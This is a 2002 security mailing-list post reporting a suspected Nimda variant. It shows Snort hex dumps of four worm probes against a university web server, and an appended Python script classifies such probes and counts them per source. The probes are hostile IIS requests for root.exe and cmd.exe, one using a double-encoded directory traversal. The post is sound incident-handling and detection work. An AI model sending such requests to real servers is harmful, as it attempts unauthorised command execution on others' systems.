Security Incidents mailing list archives

New Nimda variant?


From: Russell Fulton <r.fulton () auckland ac nz>
Date: 01 May 2002 12:07:14 +1200

Over the last few days I have been seeing increasing numbers (now up to
3 or 4 per hour) of Nimda-like attacks against web servers.

Unlike Nimda, which normally does 15 probes, this new variant only does
4 probes, as illustrated in these Snort logs:

[**] WEB-IIS CodeRed v2 root.exe access [**]
04/30-21:13:15.039903 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0x7E
64.252.104.224:3817 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:29214
IpLen:20 DgmLen:112 DF
***AP*** Seq: 0x4262A517  Ack: 0x6CBA93E  Win: 0x4248  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F  GET /scripts/roo
74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54  t.exe?/c+dir HTT
50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77  P/1.0..Host: www
0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63  ..Connnection: c
6C 6F 73 65 0D 0A 0D 0A                          lose....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

[**] WEB-IIS cmd.exe access [**]
04/30-21:13:19.727331 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0x86
64.252.104.224:3905 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:29884
IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x42AA87EB  Ack: 0x67C77D4  Win: 0x4248  TcpLen: 20
47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73  GET /c/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] WEB-IIS cmd.exe access [**]
04/30-21:13:20.547883 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0x86
64.252.104.224:4080 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:30005
IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x43380090  Ack: 0x74BEA3A  Win: 0x4248  TcpLen: 20
47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73  GET /d/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS _mem_bin access [**]
04/30-21:13:23.055837 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0xAB
64.252.104.224:4197 -> 130.216.239.5:80 TCP TTL:111 TOS:0x0 ID:30401
IpLen:20 DgmLen:157 DF
***AP*** Seq: 0x4394DC62  Ack: 0x76C208B  Win: 0x4248  TcpLen: 20
47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E  GET /_mem_bin/..
25 32 35 35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E  %255c../..%255c.
2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 77 69 6E 6E  ./..%255c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65  t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31  xe?/c+dir HTTP/1
2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43  .0..Host: www..C
6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73  onnnection: clos
65 0D 0A 0D 0A                                   e....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Has anyone caught one of these in a honeypot? If it really is something
new then the anti-virus vendors need to know about it...

-- 
Russell Fulton, Computer and Network Security Officer
The University of Auckland,  New Zealand


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
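Added example (not part of Russell Fulton's post or of the list archive): a small Python classifier that reproduces the triage a handler would do on these dumps by hand. It takes (source address, HTTP request line) pairs, percent-decodes the path repeatedly so that the `%255c` sequence in the `_mem_bin` probe is seen for what it is (double-encoded `\`, which IIS decoded twice), labels each hit with the same names Snort used above, and counts distinct probe targets per source so that a 4-probe burst can be told apart from the full 15-probe Nimda run. The input list is constructed from the four request lines in the dumps plus one hypothetical unrelated request from 192.0.2.10; the log format itself is an assumption, not something the post specifies.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample traffic (not taken from the post): the four request
# lines that appear in the Snort dumps, all from one source, plus one
# unrelated request from a hypothetical second host.
SAMPLE_REQUESTS = [
    ("64.252.104.224", "GET /scripts/root.exe?/c+dir HTTP/1.0"),
    ("64.252.104.224", "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"),
    ("64.252.104.224", "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"),
    ("64.252.104.224",
     "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"),
    ("192.0.2.10", "GET /index.html HTTP/1.0"),
]

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$")


def decode_path(raw_path, max_rounds=3):
    """Percent-decode until the string stops changing (capped at max_rounds),
    mirroring the double decode that let %255c reach IIS as a backslash.
    Returns (decoded path with backslashes folded to '/', rounds needed)."""
    current, rounds = raw_path, 0
    while rounds < max_rounds:
        decoded = unquote(current)
        if decoded == current:
            break
        current, rounds = decoded, rounds + 1
    return current.replace("\\", "/"), rounds


def classify(request_line):
    """Return a probe label for a Nimda-style request line, or None.
    Labels follow the Snort message names seen in the dumps."""
    m = REQUEST_LINE.match(request_line)
    if not m:
        return None
    path, _, _query = m.group("target").partition("?")
    decoded, rounds = decode_path(path)
    lowered = decoded.lower()
    if not lowered.endswith(("/root.exe", "/cmd.exe")):
        return None
    label = "root.exe access" if lowered.endswith("/root.exe") else "cmd.exe access"
    if "/../" in lowered:
        label += " via traversal"
    if rounds >= 2:
        label += " (double-encoded)"
    return label


def probe_bursts(requests):
    """Group probe hits by source address.
    Returns {src: {"probes": distinct request targets, "labels": sorted labels}}.
    The distinct-target count is what separates a 4-probe burst from the
    15-probe sequence the post attributes to stock Nimda."""
    targets = defaultdict(set)
    labels = defaultdict(set)
    for src, line in requests:
        label = classify(line)
        if label is None:
            continue
        targets[src].add(line.split(" ", 2)[1])
        labels[src].add(label)
    return {
        src: {"probes": len(targets[src]), "labels": sorted(labels[src])}
        for src in targets
    }


if __name__ == "__main__":
    for src, info in probe_bursts(SAMPLE_REQUESTS).items():
        print(f"{src}: {info['probes']} distinct probes")
        for label in info["labels"]:
            print(f"  - {label}")
```

Run against real access logs by replacing SAMPLE_REQUESTS with (client address, request line) pairs; sources whose distinct-probe count sits at 4 rather than the usual 15 are the candidates worth pulling full captures for, which is the honeypot question the post ends on.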

